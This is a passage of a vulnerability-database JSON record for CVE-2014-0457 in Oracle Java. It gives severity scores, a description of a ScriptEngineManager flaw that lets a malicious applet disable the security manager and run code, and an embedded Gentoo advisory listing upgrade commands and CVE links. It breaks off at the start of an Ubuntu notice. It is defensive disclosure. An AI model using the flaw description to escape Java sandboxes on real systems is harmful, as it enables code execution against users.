"@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2014-0457", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-67950", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-0457", "trust": 1.0, "value": "HIGH" }, { "author": "ZDI", "id": "CVE-2014-0457", "trust": 0.7, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201404-272", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-67950", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2014-0457", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-105" }, { "db": "VULHUB", "id": "VHN-67950" }, { "db": "VULMON", "id": "CVE-2014-0457" }, { "db": "CNNVD", "id": "CNNVD-201404-272" }, { "db": "NVD", "id": "CVE-2014-0457" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in Oracle Java SE 5.0u61, SE 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within ScriptEngineManager. With the usage of this class, it is possible to disable the security manager and run code as privileged. This allows a malicious applet to execute attacker-supplied code resulting in remote code execution under the context of the current user. \nThe vulnerability can be exploited over multiple protocols. This issue affects the \u0027Libraries\u0027 sub-component. Failed exploit attempts will result in a denial-of-service condition. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory page, listed in the References section. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201406-32\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: IcedTea JDK: Multiple vulnerabilities\n Date: June 29, 2014\n Bugs: #312297, #330205, #340819, #346799, #352035, #353418,\n #354231, #355127, #370787, #387637, #404095, #421031,\n #429522, #433389, #438750, #442478, #457206, #458410,\n #461714, #466822, #477210, #489570, #508270\n ID: 201406-32\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in the IcedTea JDK, the worst\nof which could lead to arbitrary code execution. \n\nBackground\n==========\n\nIcedTea is a distribution of the Java OpenJDK source code built with\nfree build tools. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-java/icedtea-bin \u003c 6.1.13.3 \u003e= 6.1.13.3 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in the IcedTea JDK. \nPlease review the CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll IcedTea JDK users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-java/icedtea-bin-6.1.13.3\"\n\nReferences\n==========\n\n[ 1 ] CVE-2009-3555\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555\n[ 2 ] CVE-2010-2548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548\n[ 3 ] CVE-2010-2783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783\n[ 4 ] CVE-2010-3541\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541\n[ 5 ] CVE-2010-3548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548\n[ 6 ] CVE-2010-3549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549\n[ 7 ] CVE-2010-3551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551\n[ 8 ] CVE-2010-3553\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553\n[ 9 ] CVE-2010-3554\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554\n[ 10 ] CVE-2010-3557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557\n[ 11 ] CVE-2010-3561\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561\n[ 12 ] CVE-2010-3562\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562\n[ 13 ] CVE-2010-3564\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564\n[ 14 ] CVE-2010-3565\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565\n[ 15 ] CVE-2010-3566\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566\n[ 16 ] CVE-2010-3567\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567\n[ 17 ] CVE-2010-3568\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568\n[ 18 ] CVE-2010-3569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569\n[ 19 ] CVE-2010-3573\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573\n[ 20 ] CVE-2010-3574\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574\n[ 21 ] CVE-2010-3860\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860\n[ 22 ] CVE-2010-4351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351\n[ 23 ] CVE-2010-4448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448\n[ 24 ] CVE-2010-4450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450\n[ 25 ] CVE-2010-4465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465\n[ 26 ] CVE-2010-4467\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467\n[ 27 ] CVE-2010-4469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469\n[ 28 ] CVE-2010-4470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470\n[ 29 ] CVE-2010-4471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471\n[ 30 ] CVE-2010-4472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472\n[ 31 ] CVE-2010-4476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476\n[ 32 ] CVE-2011-0025\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025\n[ 33 ] CVE-2011-0706\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706\n[ 34 ] CVE-2011-0815\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815\n[ 35 ] CVE-2011-0822\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822\n[ 36 ] CVE-2011-0862\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862\n[ 37 ] CVE-2011-0864\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864\n[ 38 ] CVE-2011-0865\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865\n[ 39 ] CVE-2011-0868\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868\n[ 40 ] CVE-2011-0869\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869\n[ 41 ] CVE-2011-0870\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870\n[ 42 ] CVE-2011-0871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871\n[ 43 ] CVE-2011-0872\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872\n[ 44 ] CVE-2011-3389\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389\n[ 45 ] CVE-2011-3521\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521\n[ 46 ] CVE-2011-3544\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544\n[ 47 ] CVE-2011-3547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547\n[ 48 ] CVE-2011-3548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548\n[ 49 ] CVE-2011-3551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551\n[ 50 ] CVE-2011-3552\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552\n[ 51 ] CVE-2011-3553\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553\n[ 52 ] CVE-2011-3554\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554\n[ 53 ] CVE-2011-3556\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556\n[ 54 ] CVE-2011-3557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557\n[ 55 ] CVE-2011-3558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558\n[ 56 ] CVE-2011-3560\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560\n[ 57 ] CVE-2011-3563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563\n[ 58 ] CVE-2011-3571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571\n[ 59 ] CVE-2011-5035\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035\n[ 60 ] CVE-2012-0497\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497\n[ 61 ] CVE-2012-0501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501\n[ 62 ] CVE-2012-0502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502\n[ 63 ] CVE-2012-0503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503\n[ 64 ] CVE-2012-0505\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505\n[ 65 ] CVE-2012-0506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506\n[ 66 ] CVE-2012-0547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547\n[ 67 ] CVE-2012-1711\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711\n[ 68 ] CVE-2012-1713\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713\n[ 69 ] CVE-2012-1716\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716\n[ 70 ] CVE-2012-1717\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717\n[ 71 ] CVE-2012-1718\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718\n[ 72 ] CVE-2012-1719\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719\n[ 73 ] CVE-2012-1723\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723\n[ 74 ] CVE-2012-1724\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724\n[ 75 ] CVE-2012-1725\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725\n[ 76 ] CVE-2012-1726\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726\n[ 77 ] CVE-2012-3216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216\n[ 78 ] CVE-2012-3422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422\n[ 79 ] CVE-2012-3423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423\n[ 80 ] CVE-2012-4416\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416\n[ 81 ] CVE-2012-4540\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540\n[ 82 ] CVE-2012-5068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068\n[ 83 ] CVE-2012-5069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069\n[ 84 ] CVE-2012-5070\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070\n[ 85 ] CVE-2012-5071\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071\n[ 86 ] CVE-2012-5072\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072\n[ 87 ] CVE-2012-5073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073\n[ 88 ] CVE-2012-5074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074\n[ 89 ] CVE-2012-5075\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075\n[ 90 ] CVE-2012-5076\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076\n[ 91 ] CVE-2012-5077\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077\n[ 92 ] CVE-2012-5081\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081\n[ 93 ] CVE-2012-5084\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084\n[ 94 ] CVE-2012-5085\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085\n[ 95 ] CVE-2012-5086\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086\n[ 96 ] CVE-2012-5087\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087\n[ 97 ] CVE-2012-5089\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089\n[ 98 ] CVE-2012-5979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979\n[ 99 ] CVE-2013-0169\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169\n[ 100 ] CVE-2013-0401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401\n[ 101 ] CVE-2013-0424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424\n[ 102 ] CVE-2013-0425\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425\n[ 103 ] CVE-2013-0426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426\n[ 104 ] CVE-2013-0427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427\n[ 105 ] CVE-2013-0428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428\n[ 106 ] CVE-2013-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429\n[ 107 ] CVE-2013-0431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431\n[ 108 ] CVE-2013-0432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432\n[ 109 ] CVE-2013-0433\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433\n[ 110 ] CVE-2013-0434\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434\n[ 111 ] CVE-2013-0435\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435\n[ 112 ] CVE-2013-0440\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440\n[ 113 ] CVE-2013-0441\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441\n[ 114 ] CVE-2013-0442\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442\n[ 115 ] CVE-2013-0443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443\n[ 116 ] CVE-2013-0444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444\n[ 117 ] CVE-2013-0450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450\n[ 118 ] CVE-2013-0809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809\n[ 119 ] CVE-2013-1475\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475\n[ 120 ] CVE-2013-1476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476\n[ 121 ] CVE-2013-1478\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478\n[ 122 ] CVE-2013-1480\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480\n[ 123 ] CVE-2013-1484\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484\n[ 124 ] CVE-2013-1485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485\n[ 125 ] CVE-2013-1486\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486\n[ 126 ] CVE-2013-1488\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488\n[ 127 ] CVE-2013-1493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493\n[ 128 ] CVE-2013-1500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500\n[ 129 ] CVE-2013-1518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518\n[ 130 ] CVE-2013-1537\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537\n[ 131 ] CVE-2013-1557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557\n[ 132 ] CVE-2013-1569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569\n[ 133 ] CVE-2013-1571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571\n[ 134 ] CVE-2013-2383\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383\n[ 135 ] CVE-2013-2384\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384\n[ 136 ] CVE-2013-2407\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407\n[ 137 ] CVE-2013-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412\n[ 138 ] CVE-2013-2415\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415\n[ 139 ] CVE-2013-2417\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417\n[ 140 ] CVE-2013-2419\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419\n[ 141 ] CVE-2013-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420\n[ 142 ] CVE-2013-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421\n[ 143 ] CVE-2013-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422\n[ 144 ] CVE-2013-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423\n[ 145 ] CVE-2013-2424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424\n[ 146 ] CVE-2013-2426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426\n[ 147 ] CVE-2013-2429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429\n[ 148 ] CVE-2013-2430\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430\n[ 149 ] CVE-2013-2431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431\n[ 150 ] CVE-2013-2436\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436\n[ 151 ] CVE-2013-2443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443\n[ 152 ] CVE-2013-2444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444\n[ 153 ] CVE-2013-2445\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445\n[ 154 ] CVE-2013-2446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446\n[ 155 ] CVE-2013-2447\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447\n[ 156 ] CVE-2013-2448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448\n[ 157 ] CVE-2013-2449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449\n[ 158 ] CVE-2013-2450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450\n[ 159 ] CVE-2013-2451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451\n[ 160 ] CVE-2013-2452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452\n[ 161 ] CVE-2013-2453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453\n[ 162 ] CVE-2013-2454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454\n[ 163 ] CVE-2013-2455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455\n[ 164 ] CVE-2013-2456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456\n[ 165 ] CVE-2013-2457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457\n[ 166 ] CVE-2013-2458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458\n[ 167 ] CVE-2013-2459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459\n[ 168 ] CVE-2013-2460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460\n[ 169 ] CVE-2013-2461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461\n[ 170 ] CVE-2013-2463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463\n[ 171 ] CVE-2013-2465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465\n[ 172 ] CVE-2013-2469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469\n[ 173 ] CVE-2013-2470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470\n[ 174 ] CVE-2013-2471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471\n[ 175 ] CVE-2013-2472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472\n[ 176 ] CVE-2013-2473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473\n[ 177 ] CVE-2013-3829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829\n[ 178 ] CVE-2013-4002\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002\n[ 179 ] CVE-2013-5772\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772\n[ 180 ] CVE-2013-5774\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774\n[ 181 ] CVE-2013-5778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778\n[ 182 ] CVE-2013-5780\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780\n[ 183 ] CVE-2013-5782\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782\n[ 184 ] CVE-2013-5783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783\n[ 185 ] CVE-2013-5784\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784\n[ 186 ] CVE-2013-5790\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790\n[ 187 ] CVE-2013-5797\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797\n[ 188 ] CVE-2013-5800\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800\n[ 189 ] CVE-2013-5802\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802\n[ 190 ] CVE-2013-5803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803\n[ 191 ] CVE-2013-5804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804\n[ 192 ] CVE-2013-5805\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805\n[ 193 ] CVE-2013-5806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806\n[ 194 ] CVE-2013-5809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809\n[ 195 ] CVE-2013-5814\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814\n[ 196 ] CVE-2013-5817\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817\n[ 197 ] CVE-2013-5820\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820\n[ 198 ] CVE-2013-5823\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823\n[ 199 ] CVE-2013-5825\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825\n[ 200 ] CVE-2013-5829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829\n[ 201 ] CVE-2013-5830\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830\n[ 202 ] CVE-2013-5840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840\n[ 203 ] CVE-2013-5842\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842\n[ 204 ] CVE-2013-5849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849\n[ 205 ] CVE-2013-5850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850\n[ 206 ] CVE-2013-5851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851\n[ 207 ] CVE-2013-6629\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629\n[ 208 ] CVE-2013-6954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954\n[ 209 ] CVE-2014-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429\n[ 210 ] CVE-2014-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446\n[ 211 ] CVE-2014-0451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451\n[ 212 ] CVE-2014-0452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452\n[ 213 ] CVE-2014-0453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453\n[ 214 ] CVE-2014-0456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456\n[ 215 ] CVE-2014-0457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457\n[ 216 ] CVE-2014-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458\n[ 217 ] CVE-2014-0459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459\n[ 218 ] CVE-2014-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460\n[ 219 ] CVE-2014-0461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461\n[ 220 ] CVE-2014-1876\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876\n[ 221 ] CVE-2014-2397\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397\n[ 222 ] CVE-2014-2398\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398\n[ 223 ] CVE-2014-2403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403\n[ 224 ] CVE-2014-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412\n[ 225 ] CVE-2014-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414\n[ 226 ] CVE-2014-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421\n[ 227 ] CVE-2014-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423\n[ 228 ] CVE-2014-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201406-32.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. ============================================================================\nUbuntu Security Notice USN-2187-1\nApril 30, 2014\n\nopenjdk-7 vulnerabilities\n============================================================================\n\nA security issue affects these releases 